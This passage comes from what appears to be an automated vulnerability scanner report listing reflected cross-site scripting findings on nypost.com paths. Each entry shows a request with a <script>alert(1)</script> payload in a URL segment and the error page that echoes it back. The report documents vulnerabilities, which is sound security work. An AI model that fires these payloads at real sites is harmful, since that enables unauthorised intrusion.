<p>/r/SysConfig/WebPortal/nypost/blocks43523<script>alert(1)</script>917bd814d80/_news/local/events/local_events.js</p>
...[SNIP]...

1.385. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 874e6<script>alert(1)</script>5349f1df09d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news874e6<script>alert(1)</script>5349f1df09d/local/events/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news874e6<script>alert(1)</script>5349f1df09d/local/events/local_events.js</p>
...[SNIP]...

1.386. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d6a5e<script>alert(1)</script>4d482c46305 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/locald6a5e<script>alert(1)</script>4d482c46305/events/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/locald6a5e<script>alert(1)</script>4d482c46305/events/local_events.js</p>
...[SNIP]...

1.387. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 564c4<script>alert(1)</script>5026bd0f88f was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events564c4<script>alert(1)</script>5026bd0f88f/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/events564c4<script>alert(1)</script>5026bd0f88f/local_events.js</p>
...[SNIP]...

1.388. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 15f35<script>alert(1)</script>bfd25e01ef7 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js15f35<script>alert(1)</script>bfd25e01ef7 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js15f35<script>alert(1)</script>bfd25e01ef7</p>
...[SNIP]...

1.389. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba4a2<script>alert(1)</script>9a45b26121c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigba4a2<script>alert(1)</script>9a45b26121c/WebPortal/nypost/blocks/_news/local/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigba4a2<script>alert(1)</script>9a45b26121c/WebPortal/nypost/blocks/_news/local/local.css</p>
...[SNIP]...

1.390. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d6eb<script>alert(1)</script>20becc93b14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal6d6eb<script>alert(1)</script>20becc93b14/nypost/blocks/_news/local/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal6d6eb<script>alert(1)</script>20becc93b14/nypost/blocks/_news/local/local.css</p>
...[SNIP]...

1.391. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c295<script>alert(1)</script>60a0cb9624a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost7c295<script>alert(1)</script>60a0cb9624a/blocks/_news/local/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost7c295<script>alert(1)</script>60a0cb9624a/blocks/_news/local/local.css</p>
...[SNIP]...

1.392. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8ace1<script>alert(1)</script>d7a993fb0dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks8ace1<script>alert(1)</script>d7a993fb0dc/_news/local/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:01 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks8ace1<script>alert(1)</script>d7a993fb0dc/_news/local/local.css</p>
...[SNIP]...

1.393. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5ebb5<script>alert(1)</script>9713bc263f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news5ebb5<script>alert(1)</script>9713bc263f/local/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:03 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news5ebb5<script>alert(1)</script>9713bc263f/local/local.css</p>
...[SNIP]...

1.394. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5cbd0<script>alert(1)</script>a29d0400b7c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local5cbd0<script>alert(1)</script>a29d0400b7c/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local5cbd0<script>alert(1)</script>a29d0400b7c/local.css</p>
...[SNIP]...

1.395. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 84f1a<script>alert(1)</script>a87ff4a5d90 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css84f1a<script>alert(1)</script>a87ff4a5d90 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css84f1a<script>alert(1)</script>a87ff4a5d90</p>
...[SNIP]...

1.396. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a47ee<script>alert(1)</script>f31340ef57e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfiga47ee<script>alert(1)</script>f31340ef57e/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfiga47ee<script>alert(1)</script>f31340ef57e/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js</p>
...[SNIP]...

1.397. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 659e1<script>alert(1)</script>b1eba14ad45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal659e1<script>alert(1)</script>b1eba14ad45/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal659e1<script>alert(1)</script>b1eba14ad45/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js</p>
...[SNIP]...

1.398. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5b39<script>alert(1)</script>4dd47e17859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostf5b39<script>alert(1)</script>4dd47e17859/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostf5b39<script>alert(1)</script>4dd47e17859/blocks/_promos/promos_and_partners/promos_and_partners.js</p>
...[SNIP]...

1.399. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f43d7<script>alert(1)</script>5a12128219d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksf43d7<script>alert(1)</script>5a12128219d/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksf43d7<script>alert(1)</script>5a12128219d/_promos/promos_and_partners/promos_and_partners.js</p>
...[SNIP]...

1.400. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f104b<script>alert(1)</script>125a1c5d4f2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_promosf104b<script>alert(1)</script>125a1c5d4f2/promos_and_partners/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_promosf104b<script>alert(1)</script>125a1c5d4f2/promos_and_partners/promos_and_partners.js</p>
...[SNIP]...

1.401. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 76ef3<script>alert(1)</script>79757c82828 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners76ef3<script>alert(1)</script>79757c82828/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners76ef3<script>alert(1)</script>79757c82828/promos_and_partners.js</p>
...[SNIP]...

1.402. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 4c350<script>alert(1)</script>d838fbfb9b4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js4c350<script>alert(1)</script>d838fbfb9b4 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 743
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js4c350<script>alert(1)</script>d838fbfb9b4</p>
...[SNIP]...

